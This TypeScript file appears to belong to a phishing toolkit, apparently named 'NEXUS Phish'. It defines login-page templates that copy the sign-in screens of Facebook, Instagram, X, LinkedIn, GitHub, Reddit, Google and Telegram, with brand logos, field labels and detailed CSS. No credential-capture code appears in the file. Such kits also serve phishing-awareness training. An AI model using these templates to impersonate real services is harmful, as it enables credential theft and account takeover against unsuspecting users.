import { Github, Instagram, Facebook, Twitter, Linkedin, MessageSquare, Send } from "lucide-react";
import { LoginTemplate } from "./types";

export const socialTemplates: LoginTemplate[] = [
  {
    id: "facebook",
    name: "Facebook",
    description: "Facebook helps you connect and share with the people in your life.",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/fb.png?updatedAt=1744039601268",
    primaryColor: "#1877F2",
    secondaryColor: "#42B72A",
    usernameLabel: "Email or phone number",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Log in",
    forgotPasswordText: "Forgotten password?",
    signupText: "Create new account",
    additionalOptions: [
      { text: "Create a Page for a celebrity, brand or business.", url: "#" }
    ],
    category: "social"
  },
  {
    id: "instagram",
    name: "Instagram",
    description: "Log in to Instagram",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/instagram%20(2).png?updatedAt=1744703009936",
    secondaryLogoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/igg.png?updatedAt=1744040052929",
    primaryColor: "#0095F6",
    secondaryColor: "#385185",
    usernameLabel: "Phone number, username, or email",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Log in",
    forgotPasswordText: "Forgot password?",
    signupText: "Don't have an account? Sign up",
    additionalOptions: [
      { text: "Log in with Facebook", url: "#" }
    ],
    customCSS: `
      .instagram-container {
        display: flex;
        min-height: 100vh;
        background-color: #fafafa;
        padding: 20px;
      }
      .instagram-content {
        display: flex;
        max-width: 935px;
        width: 100%;
        margin: auto;
        gap: 32px;
      }
      .instagram-phones {
        flex: 1;
        max-width: 380px;
        background-image: url('https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/ig.jpeg?updatedAt=1744039601430');
        background-size: contain;
        background-repeat: no-repeat;
        background-position: center;
      }
      .instagram-form-wrapper {
        width: 350px;
        margin-top: 12px;
      }
      .instagram-form {
        background: white;
        border: 1px solid #dbdbdb;
        border-radius: 1px;
        padding: 20px 40px;
        margin-bottom: 10px;
      }
      .instagram-logo {
        display: block;
        margin: 22px auto 12px;
        height: 51px;
        width: 175px;
      }
      .instagram-input {
        background: #fafafa;
        border: 1px solid #dbdbdb;
        border-radius: 3px;
        padding: 9px 8px 7px;
        color: #262626;
        font-size: 14px;
        width: 100%;
        margin: 0 0 6px;
      }
      .instagram-input:focus {
        border-color: #a8a8a8;
      }
      .instagram-btn {
        background: #0095f6;
        color: white;
        padding: 7px 16px;
        font-weight: 600;
        font-size: 14px;
        width: 100%;
        margin: 8px 0;
        border-radius: 8px;
      }
      .instagram-btn:disabled {
        opacity: 0.7;
      }
      .instagram-separator {
        display: flex;
        align-items: center;
        margin: 10px 0 18px;
      }
      .instagram-separator-line {
        flex: 1;
        height: 1px;
        background: #dbdbdb;
      }
      .instagram-separator-text {
        margin: 0 18px;
        font-size: 13px;
        font-weight: 600;
        color: #737373;
        text-transform: uppercase;
      }
      .instagram-facebook {
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 8px;
        color: #385185;
        font-size: 14px;
        font-weight: 600;
        margin: 8px 0;
        text-decoration: none;
      }
      .instagram-facebook svg {
        width: 16px;
        height: 16px;
        color: #385185;
      }
      .instagram-forgot {
        color: #00376b;
        font-size: 12px;
        text-align: center;
        margin: 12px 0;
        display: block;
        text-decoration: none;
      }
      .instagram-signup {
        background: white;
        border: 1px solid #dbdbdb;
        border-radius: 1px;
        padding: 20px;
        text-align: center;
        font-size: 14px;
      }
      .instagram-signup-link {
        color: #0095f6;
        font-weight: 600;
        text-decoration: none;
      }
      .instagram-get-app {
        text-align: center;
        margin-top: 20px;
      }
      .instagram-get-app p {
        font-size: 14px;
        margin-bottom: 20px;
      }
      .instagram-app-buttons {
        display: flex;
        gap: 8px;
        justify-content: center;
      }
      .instagram-app-button {
        height: 40px;
      }
      .instagram-footer {
        text-align: center;
        padding: 20px 0;
        font-size: 12px;
        color: #8e8e8e;
      }
      .instagram-footer-links {
        display: flex;
        flex-wrap: wrap;
        justify-content: center;
        gap: 16px;
        margin-bottom: 12px;
      }
      .instagram-footer-link {
        color: #8e8e8e;
        text-decoration: none;
      }
      .instagram-footer-meta {
        display: flex;
        justify-content: center;
        align-items: center;
        gap: 16px;
      }
      @media (max-width: 875px) {
        .instagram-phones {
          display: none;
        }
        .instagram-content {
          justify-content: center;
        }
      }
    `,
    category: "social"
  },
  {
    id: "twitter",
    name: "X",
    description: "Sign in to X",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/x.png?updatedAt=1744088916297",
    primaryColor: "#1D9BF0",
    secondaryColor: "#ffffff",
    backgroundColor: "#000000",
    usernameLabel: "Phone, email, or username",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Sign in",
    forgotPasswordText: "Forgot password?",
    signupText: "Don't have an account? Sign up",
    additionalOptions: [
      { text: "Sign in with Apple", url: "#" },
      { text: "Sign in with Google", url: "#" }
    ],
    customCSS: `
      .twitter-container {
        background-color: #000;
        min-height: 100vh;
        display: flex;
        align-items: center;
        justify-content: center;
        color: #fff;
      }
      .twitter-form {
        max-width: 364px;
        width: 100%;
        padding: 20px;
      }
      .twitter-logo {
        width: 40px;
        height: 40px;
        margin-bottom: 36px;
      }
      .twitter-title {
        font-size: 31px;
        font-weight: 700;
        margin-bottom: 20px;
      }
      .twitter-input {
        background-color: transparent !important;
        border: 1px solid rgb(51, 54, 57) !important;
        border-radius: 4px !important;
        color: #fff !important;
        font-size: 15px !important;
        height: 44px !important;
        margin-bottom: 12px !important;
      }
      .twitter-input:focus {
        border-color: #1d9bf0 !important;
        box-shadow: 0 0 0 1px #1d9bf0 !important;
      }
      .twitter-btn {
        background-color: #fff !important;
        border-radius: 9999px !important;
        color: #000 !important;
        font-size: 15px !important;
        font-weight: 700 !important;
        height: 44px !important;
        margin-top: 12px !important;
        width: 100% !important;
      }
      .twitter-btn:hover {
        background-color: rgb(230, 230, 230) !important;
      }
      .twitter-forgot {
        color: #1d9bf0;
        font-size: 13px;
        margin-top: 16px;
        text-decoration: none;
      }
      .twitter-forgot:hover {
        text-decoration: underline;
      }
      .twitter-separator {
        display: flex;
        align-items: center;
        margin: 20px 0;
        color: rgb(113, 118, 123);
      }
      .twitter-separator-line {
        flex: 1;
        height: 1px;
        background-color: rgb(51, 54, 57);
      }
      .twitter-separator-text {
        margin: 0 12px;
        font-size: 15px;
      }
      .twitter-social-btn {
        background-color: #fff !important;
        border-radius: 9999px !important;
        color: #000 !important;
        font-size: 15px !important;
        font-weight: 500 !important;
        height: 44px !important;
        margin-bottom: 8px !important;
        width: 100% !important;
        display: flex !important;
        align-items: center !important;
        justify-content: center !important;
        gap: 8px !important;
      }
      .twitter-social-btn:hover {
        background-color: rgb(230, 230, 230) !important;
      }
    `,
    category: "social"
  },
  {
    id: "linkedin",
    name: "LinkedIn",
    description: "Make the most of your professional life",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/linkedin.png?updatedAt=1742184501495",
    primaryColor: "#0A66C2",
    secondaryColor: "#FFFFFF",
    backgroundColor: "#F3F2EF",
    usernameLabel: "Email or Phone",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Sign in",
    forgotPasswordText: "Forgot password?",
    signupText: "New to LinkedIn? Join now",
    additionalOptions: [
      { text: "Sign in with Google", url: "#" }
    ],
    customCSS: `
      .linkedin-container {
        min-height: 100vh;
        background-color: #f3f2ef;
        padding: 24px;
      }
      .linkedin-form {
        max-width: 400px;
        margin: 0 auto;
        padding: 24px;
        background: #fff;
        border-radius: 8px;
        box-shadow: 0 4px 12px rgba(0,0,0,0.15);
      }
      .linkedin-logo {
        height: 34px;
        margin-bottom: 24px;
      }
      .linkedin-title {
        font-size: 32px;
        font-weight: 600;
        line-height: 1.25;
        margin-bottom: 8px;
        color: rgba(0,0,0,0.9);
      }
      .linkedin-subtitle {
        font-size: 14px;
        line-height: 1.42857;
        color: rgba(0,0,0,0.9);
        margin-bottom: 24px;
      }
      .linkedin-input {
        border: 1px solid rgba(0,0,0,0.6) !important;
        border-radius: 4px !important;
        height: 48px !important;
        padding: 0 16px !important;
        font-size: 16px !important;
        line-height: 1.33333 !important;
        color: rgba(0,0,0,0.9) !important;
        margin-bottom: 12px !important;
      }
      .linkedin-input:focus {
        border: 2px solid #0a66c2 !important;
        box-shadow: 0 0 0 1px #0a66c2 !important;
      }
      .linkedin-forgot {
        color: #0a66c2;
        font-weight: 600;
        font-size: 16px;
        line-height: 1.33333;
        text-decoration: none;
      }
      .linkedin-forgot:hover {
        text-decoration: underline;
        color: #004182;
      }
      .linkedin-btn {
        background-color: #0a66c2 !important;
        border-radius: 24px !important;
        color: #fff !important;
        font-size: 16px !important;
        font-weight: 600 !important;
        height: 48px !important;
        line-height: 1.33333 !important;
        width: 100% !important;
        margin: 16px 0 !important;
      }
      .linkedin-btn:hover {
        background-color: #004182 !important;
      }
      .linkedin-separator {
        display: flex;
        align-items: center;
        margin: 16px 0;
        color: rgba(0,0,0,0.6);
      }
      .linkedin-separator-line {
        flex: 1;
        height: 1px;
        background-color: rgba(0,0,0,0.15);
      }
      .linkedin-separator-text {
        margin: 0 12px;
        font-size: 14px;
        line-height: 1.42857;
      }
      .linkedin-google {
        border: 1px solid rgba(0,0,0,0.6) !important;
        border-radius: 24px !important;
        color: rgba(0,0,0,0.6) !important;
        font-size: 16px !important;
        font-weight: 600 !important;
        height: 48px !important;
        line-height: 1.33333 !important;
        width: 100% !important;
        display: flex !important;
        align-items: center !important;
        justify-content: center !important;
        gap: 8px !important;
      }
      .linkedin-google:hover {
        background-color: rgba(0,0,0,0.04) !important;
        border-color: rgba(0,0,0,0.9) !important;
        color: rgba(0,0,0,0.9) !important;
      }
    `,
    category: "social"
  },
  {
    id: "github",
    name: "GitHub",
    description: "Sign in to GitHub",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/github.png?updatedAt=1744088916285",
    primaryColor: "#24292F",
    secondaryColor: "#FFFFFF",
    backgroundColor: "#F6F8FA",
    usernameLabel: "Username or email address",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Sign in",
    forgotPasswordText: "Forgot password?",
    signupText: "Create an account",
    customCSS: `
      .github-container {
        min-height: 100vh;
        background-color: #f6f8fa;
        padding: 24px;
      }
      .github-form {
        max-width: 308px;
        margin: 0 auto;
        padding: 16px;
      }
      .github-logo {
        width: 48px;
        height: 48px;
        margin: 0 auto 24px;
        display: block;
      }
      .github-box {
        padding: 16px;
        background-color: #fff;
        border: 1px solid #d0d7de;
        border-radius: 6px;
      }
      .github-title {
        margin-bottom: 16px;
        text-align: center;
        font-size: 24px;
        font-weight: 300;
        letter-spacing: -0.5px;
      }
      .github-label {
        display: block;
        margin-bottom: 8px;
        font-weight: 400;
        font-size: 14px;
        color: #1F2328;
      }
      .github-input {
        width: 100% !important;
        padding: 5px 12px !important;
        font-size: 14px !important;
        line-height: 20px !important;
        color: #1F2328 !important;
        background-color: #f6f8fa !important;
        border: 1px solid #d0d7de !important;
        border-radius: 6px !important;
        box-shadow: inset 0 1px 0 rgba(208,215,222,0.2) !important;
        margin-bottom: 16px !important;
      }
      .github-input:focus {
        border-color: #0969da !important;
        outline: none !important;
        box-shadow: 0 0 0 3px rgba(9,105,218,0.3) !important;
      }
      .github-forgot {
        font-size: 12px;
        color: #0969da;
        float: right;
        text-decoration: none;
      }
      .github-forgot:hover {
        text-decoration: underline;
      }
      .github-btn {
        background-color: #1F883D !important;
        border: 1px solid rgba(27,31,36,0.15) !important;
        border-radius: 6px !important;
        color: #fff !important;
        font-size: 14px !important;
        font-weight: 500 !important;
        padding: 5px 16px !important;
        width: 100% !important;
        margin-top: 16px !important;
      }
      .github-btn:hover {
        background-color: #1a7f37 !important;
      }
      .github-create {
        padding: 16px;
        text-align: center;
        border: 1px solid #d0d7de;
        border-radius: 6px;
        margin-top: 16px;
        font-size: 14px;
      }
      .github-create a {
        color: #0969da;
        text-decoration: none;
      }
      .github-create a:hover {
        text-decoration: underline;
      }
    `,
    category: "social"
  },
  {
    id: "reddit",
    name: "Reddit",
    description: "Log in to Reddit",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/Reddit_Logo.png?updatedAt=1744088916491",
    primaryColor: "#FF4500",
    secondaryColor: "#1A1A1B",
    backgroundColor: "#FFFFFF",
    usernameLabel: "Username",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Log In",
    forgotPasswordText: "Forgot password?",
    signupText: "New to Reddit? Sign up",
    additionalOptions: [
      { text: "Continue with Google", url: "#" },
      { text: "Continue with Apple", url: "#" }
    ],
    customCSS: `
      .reddit-container {
        min-height: 100vh;
        background-color: #fff;
        padding: 24px;
      }
      .reddit-form {
        max-width: 280px;
        margin: 0 auto;
      }
      .reddit-logo {
        height: 40px;
        margin-bottom: 48px;
      }
      .reddit-title {
        font-size: 20px;
        font-weight: 500;
        line-height: 24px;
        margin-bottom: 8px;
      }
      .reddit-text {
        font-size: 12px;
        line-height: 16px;
        margin-bottom: 48px;
        color: #7c7c7c;
      }
      .reddit-social {
        margin-bottom: 24px;
      }
      .reddit-social-btn {
        width: 100% !important;
        height: 40px !important;
        border: 1px solid #edeff1 !important;
        border-radius: 20px !important;
        margin-bottom: 8px !important;
        font-size: 14px !important;
        font-weight: 500 !important;
        color: #1a1a1b !important;
        background-color: #fff !important;
        display: flex !important;
        align-items: center !important;
        justify-content: center !important;
        gap: 8px !important;
      }
      .reddit-social-btn:hover {
        background-color: #f6f7f8 !important;
      }
      .reddit-separator {
        display: flex;
        align-items: center;
        margin: 24px 0;
      }
      .reddit-separator-line {
        flex: 1;
        height: 1px;
        background-color: #edeff1;
      }
      .reddit-separator-text {
        margin: 0 12px;
        font-size: 12px;
        color: #7c7c7c;
      }
      .reddit-input {
        width: 100% !important;
        height: 48px !important;
        padding: 0 16px !important;
        border: 1px solid #edeff1 !important;
        border-radius: 4px !important;
        margin-bottom: 16px !important;
        font-size: 14px !important;
      }
      .reddit-input:focus {
        border-color: #1a1a1b !important;
        outline: none !important;
      }
      .reddit-btn {
        width: 100% !important;
        height: 40px !important;
        background-color: #ff4500 !important;
        border-radius: 20px !important;
        color: #fff !important;
        font-size: 14px !important;
        font-weight: 700 !important;
        margin-top: 8px !important;
      }
      .reddit-btn:hover {
        background-color: #f23b00 !important;
      }
      .reddit-forgot {
        font-size: 12px;
        color: #0079d3;
        text-decoration: none;
        margin-top: 8px;
        display: block;
      }
      .reddit-forgot:hover {
        color: #3394dc;
      }
      .reddit-signup {
        font-size: 12px;
        margin-top: 24px;
        text-align: center;
      }
      .reddit-signup a {
        color: #0079d3;
        text-decoration: none;
      }
      .reddit-signup a:hover {
        color: #3394dc;
      }
    `,
    category: "social"
  },
  {
    id: "google",
    name: "Google",
    description: "Sign in to continue to Google",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/google.png?updatedAt=1744088916291",
    primaryColor: "#1A73E8",
    secondaryColor: "#FFFFFF",
    backgroundColor: "#FFFFFF",
    usernameLabel: "Email or phone",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Next",
    forgotPasswordText: "Forgot email?",
    signupText: "Create account",
    customCSS: `
      .google-container {
        min-height: 100vh;
        background-color: #fff;
        padding: 24px;
        display: flex;
        align-items: center;
        justify-content: center;
      }
      .google-form {
        width: 100%;
        max-width: 450px;
        padding: 48px 40px 36px;
        border: 1px solid #dadce0;
        border-radius: 8px;
      }
      .google-logo {
        display: block;
        margin: 0 auto 24px;
        height: 24px;
      }
      .google-title {
        color: #202124;
        font-size: 24px;
        font-weight: 400;
        line-height: 1.3333;
        margin-bottom: 8px;
        text-align: center;
      }
      .google-subtitle {
        color: #202124;
        font-size: 16px;
        font-weight: 400;
        letter-spacing: 0.1px;
        line-height: 1.5;
        margin-bottom: 32px;
        text-align: center;
      }
      .google-input {
        width: 100% !important;
        height: 56px !important;
        padding: 13px 15px !important;
        border: 1px solid #dadce0 !important;
        border-radius: 4px !important;
        color: #202124 !important;
        font-size: 16px !important;
        margin-bottom: 24px !important;
      }
      .google-input:focus {
        border-color: #1a73e8 !important;
        outline: none !important;
      }
      .google-forgot {
        color: #1a73e8;
        font-weight: 500;
        letter-spacing: 0.25px;
        text-decoration: none;
        font-size: 14px;
      }
      .google-forgot:hover {
        background-color: #f6fafe;
      }
      .google-text {
        color: #5f6368;
        font-size: 14px;
        line-height: 1.4286;
        margin-bottom: 32px;
      }
      .google-buttons {
        display: flex;
        justify-content: space-between;
        align-items: center;
      }
      .google-create {
        color: #1a73e8;
        font-weight: 500;
        letter-spacing: 0.25px;
        font-size: 14px;
        text-decoration: none;
      }
      .google-create:hover {
        background-color: #f6fafe;
      }
      .google-next {
        background-color: #1a73e8 !important;
        color: #fff !important;
        padding: 0 24px !important;
        border-radius: 4px !important;
        font-size: 14px !important;
        font-weight: 500 !important;
        height: 36px !important;
        letter-spacing: 0.25px !important;
      }
      .google-next:hover {
        background-color: #1557b0 !important;
        box-shadow: 0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15) !important;
      }
    `,
    category: "social"
  },
  {
    id: "telegram",
    name: "Telegram",
    description: "Welcome to Telegram",
    icon: Send,
    primaryColor: "#0088cc",
    secondaryColor: "#0099ff",
    backgroundColor: "#fff",
    usernameLabel: "Phone Number",
    usernameType: "tel",
    passwordLabel: "Code",
    buttonText: "Next",
    forgotPasswordText: "Forgot Password?",
    signupText: "New to Telegram? Sign up",
    additionalOptions: [
      { text: "Log in by QR Code", url: "#" }
    ],
    category: "social"
  }
];